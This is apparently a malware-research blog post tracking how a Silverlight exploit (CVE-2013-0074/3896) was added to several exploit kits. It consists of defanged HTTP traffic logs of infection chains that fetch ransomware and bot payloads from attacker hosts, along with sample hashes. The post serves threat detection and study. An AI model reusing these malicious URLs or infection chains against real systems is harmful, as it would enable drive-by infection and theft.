2013-11-13 - Exploit Integration

CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits

Angler EK is definitely on the move. It's not a huge surprise when we can speculate that the team behind is the same that was first using Cool EK (Paunch VIP customer) and is behind the Reveton threat.

After integrating CVE-2013-0634 past week

EKWatcher has spotted a new change today : the silverlight check has now been activated and deliver an exploit.
Pedro Marinho from Emerging Threats pointed links with Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure

(right now I don't understand why CVE-2013-3896 is mentionned here. Will update if I learn about it
<edit: 2013-11-26> so CVE-2013-3896 is used to bypass ASLR (cf post from Yuki Chen - TrendMicro)</edit>

CVE-2013-0074/3896 pass in Angler EK :

CVE-2013-0074 successful pass in Angler EK

 Silverlight 5.1.10411.0 Addon In IE  used in that pass

Note: I made a pass with Silverlight 5.1.20513.0 - as fire condition told us : safe.

GET http://peragretisque.yevgenimalkin .com/leoccvkead
200 OK (text/html)

Sliverlight version checks
Angler EK 2013-11-13

Deciding if Silverlight must be fired : "sterlings"
in Angler - 2013-11-13

Call for Silverlight Exploit in Angler 2013-11-13
GET http://peragretisque.yevgenimalkin .com/0leoccvkeadmnp
200 OK (text/html)

Silverlight Call
Content of that zip
Dll TimeStamp

The DLL ( 5f36a4c019d559f1be9fdd0cd770be2e ) would be worth some works but as often, I do not have the knowledge right now to provide useful data. Will link analysis that may come.

GET http://peragretisque.yevgenimalkin .com/1leoccvkeadmnp
200 OK (application/octet-stream) Xored Reveton Ransomware.

One of the US Reveton Design
Firefox ?
 Silverlight 5.1.10411.0 Addon In Firefox 17
Interaction is required :
Firefox Warning on Silverlight call from Angler EK
If you click... Boom...
Silverlight 5.1.10411.0 - Firefox 17
Angler EK 2013-11-13
<edit1 2013-11-19 >

Files :
Here is a Pcap
(Courtesy of Will Metcalf from Emerging Threats).
Here is a Fiddler

Styx Kein : (2013-11-19)
Have been told it was there (Thanks !)

CVE-2013-0074 positive pass in Styx Kein 2013-11-19
(payload taken from Angler EK...or more likely from here :/ )
GET http://www3.3b812bc6.kjyg .com/?7u4s=W%2BWd13CVXqabxqBnaKdrqlnOq25flomqq%2BFx1WTGbmFilZVub6VY
302 Moved Temporarily to http://www1.gh1pn3avb63m2.4pu.com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW

GET http://www1.gh1pn3avb63m2.4pu .com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW
200 OK (text/html)

GET http://www1.gh1pn3avb63m2.4pu .com/nnnnvdd.html
200 OK (text/html)

Once Decoded
This is the Java detected that will choose to fire CVE based on your version.
Should be : jorg.html should be CVE-2013-0431 or CVE-2013-0422
jvvn.html should be CVE-2013-2465
jply.html could be CVE-2013-2472 + Click 2 play bypass if it's same as in Styx
If Java does not Fire...then let's check PDF !

GET http://www1.gh1pn3avb63m2.4pu .com/pdfx.html
200 OK (text/html)

GET http://www1.gh1pn3avb63m2.4pu .com/qopne.html
200 OK (text/html)

Once decoded :
We can see the conditions to fire the CVE-2011-3402 (fnts.html)
Then some checks to fire CVE-2010-0188 (PDF)
And if PDF conditions two bullets are fired :
CVE-2013-2551 ( iexp.html) and CVE-2013-0074 (silverlight)

GET http://www1.gh1pn3avb63m2.4pu .com/iexp.html
200 OK (text/html) Call for CVE-2013-2551

GET http://www1.gh1pn3avb63m2.4pu .com/retn.html
200 OK (text/html) Call for Call (sic) for CVE-2013-0074

Call for s.html

GET http://www1.gh1pn3avb63m2.4pu .com/hdht.html
200 OK (text/html) CVE-2013-2551

GET http://www1.gh1pn3avb63m2.4pu .com/s.html
200 OK (text/html)

Call for Silverlight Exploit
(and preparation of Variable to give to the Exploit - note xlkey = 1)

GET http://www1.gh1pn3avb63m2.4pu .com/zip.eot
200 OK (application/vnd.ms-fontobject) cb9f864eb3b63172d01f9f45d849cc15

Contains :
Content of the Silverlight Call
Rip from Angler EK (or more likely from this blog... :/ )
5f36a4c019d559f1be9fdd0cd770be2e :) exact same DLL than Angler EK They didn't even try to rebuilt their exploit from Sources.

GET http://www1.gh1pn3avb63m2.4pu .com/1a8aqgdg7qedig.eot
200 OK (application/vnd.ms-fontobject)  (note the 14 character Angler-ish pattern :) ) dc7647bc7896912b0fea4b93815e7fd0
This is the Actual Payload of the Exploit. It's in fact a loader that will grab the real objective : Simda

GET http://www2.h-qo05lqa59ljh7.wpbh .org/?aptlxbvy=hdPh0LXH7t6OotrTbWado5hsX%2BDe1HTDodiiqJKpq6BloZWkqKmilG1tpKKhcJKnmtjrn6epmGWX0JKX3q6ziYSS2tGbnqOa35w%3D&h=71
200 OK (application/octet-stream)   77cafd814d93ed7154676744fcf7ae75 Simda (Podmena Affiliate payload)

Want to know more about Styx Kein ? Read Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto) 2013-11-12

Files: Payload, decoded js and Fiddler (Owncloud via goo.gl)

FlashPack : 2013-12-06 (child of SafePack/CritXPack/Vintage Pack)
As Spotted by Eoin Miller the Silverlight Exploit is now in FlashPack.
(I will fly over).

CVE-2013-0074/3896 Successful pass in FlashPack

GET http://besexeweryopko .com/cosmik/hkmh90B4.php
200 OK (text/html)

GET http://besexeweryopko .com/cosmik/capuro/da7c6b38522017d83733eac7775c7dbe.js
200 OK (application/javascript)

GET http://besexeweryopko .com/cosmik/silver.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html)

Here, id converted from Hex to Text gives you :||11.6.602.180|5.1.10411.0|Windows 7|MSIE 10

which are respectively : 
Adobe Reader, Java ,Flash, Silverlight, OS and Browser  version 


GET http://besexeweryopko .com/cosmik/msie.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html) <- CVE-2013-2551

GET http://besexeweryopko .com/cosmik/capuro/def6f322082144f16a8450c1d0051eeb.eot
200 OK (text/plain)

Content of the "eot"
fotomaster-cleaner.dll : 5faca70a46982cb945cd8e4b3a544aa8
TimeStamp : 2013-12-04 16:35:38

GET http://besexeweryopko .com/cosmik/capuro/fa6030784e2d535687f8c94b210dfb65.eot
200 OK (text/plain)

2nd "eot" (seems to contains parameters).

GET http://besexeweryopko .com/cosmik/loadsilver.php
200 OK (application/octet-stream)  b61b986194de5fef36d805923a0f9379 (Zaccess)

Fiddler : Here

Fiesta : 2014-01-03 (integration around 2013-12-28)
Thanks Nathan Fowler for Referer!
As spotted yesterday by Will Metcalf from Emerging Threats

CVE-2013-0074/3896 successful pass in Fiesta
GET http://img.hitres .in/uiwtv07/counter.php?id=2
301 Moved Permanently to http://img.hitres.in/uiwtv07/?2 (note : you won't see this pattern in all Fiesta pass)

GET http://img.hitres .in/uiwtv07/?2
200 OK (text/html)

GET http://img.hitres .in/uiwtv07/?25ea404b5396cf485b50095a060b065102015c500f045652090057020200065406
200 OK (text/html) CVE-2013-2551 try

GET http://img.hitres .in/uiwtv07/?6ec285af089912d6450915090a0e535506515a03030103560d5051510e05535002;5110411
200 OK (application/x-silverlight-app) (Note the Silverlight Version in the call) ce056895e07d2a9d04c5e8db844013ea

GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6
200 OK (application/octet-stream) bdcfe33dbc7f86b929ddfbfa7a4ce43d which is Miuref.A (MS name) dropping : 71af22a63b970e0ec14e17497a33ba43 Miuref. (If anyone has worked on it, i'd love knowing what is this stuff about as it's becoming widely spread)

GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6;1
200 OK (text/html)

Files : Fiddler, Payloads

Goon/Redkit2:  ~2014-01-22

Pcap of the infection  provided by Will Metcalf. Thanks !

Successfull path in Goon on 2014-01-22
Then Kelihos Spambot loading Simda and Kelihos bot

GET http://disabilitybenefitsinsider .com/home/au/link/xmlupdater.html
200 OK (text/html)

end of CVE-2013-2551 and Silverlight call
Base64 decoded to:

Shellcode as Parameter

GET http://disabilitybenefitsinsider .com/FFE.xap
200 OK (application/x-silverlight-app)  167a0ffcfb6d828f5090b58d0b3c6b30

Xap contains
Silverlight.dll : 83b0c1ff586044dbc6c0b99c55e27534
Nicely handled by dotpeek :
Silverlight.dll in dotpeek.

GET http://disabilitybenefitsinsider .com/68283080.mp3
200 OK (application/x-msdownload)

Himan : 2014-01-23 (quite surely before. date spotted)

Silverlight CVE-2013-0074/3896 positive path in Himan
GET http://jvdsdveee .pw/tevyhyme.php
200 OK (text/html)

GET http://jvdsdveee .pw/po/yt.js
200 OK (application/x-javascript)

POST http://jvdsdveee .pw/index.php
200 OK (text/html)

GET http://jvdsdveee .pw/resirypenxuvore/xie.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-2551

GET http://jvdsdveee .pw/resirypenxuvore/fla.php?wq=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-0634

GET http://jvdsdveee .pw/resirypenxuvore/xe.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) Silverlight Exploit Call

Silverlight Exploit call in HiMan 2014-01-23

Didn't try to decode.

GET http://jvdsdveee .pw/resirypenxuvore/d.php?hgfc=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (application/pdf)

GET http://jvdsdveee .pw/resirypenxuvore/1.zip
200 OK (application/zip) ce056895e07d2a9d04c5e8db844013ea cf Fiesta. Same Exact sample.

GET http://jvdsdveee .pw/resirypenxuvore/tx.exe
200 OK (application/octet-stream) (Ransomware 7043831f829fd8305a59cc6df09cc8b6 )

GET http://jvdsdveee .pw/resirypenxuvore/b.jar
200 OK (application/java-archive)

Nuclear Pack :    2014-09-12

Spotted by Brad

Post Publication Reading :
A Look At A Silverlight Exploit - Yuki Chen - TrendMicro 2013-11-25

Read More :
Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure Authored by Vitaliy Toropov
CVE-2013-0074 NIST
Lua Script by  Emerging Threats  to detect the exploitation in Suricata (can also be run from Command line)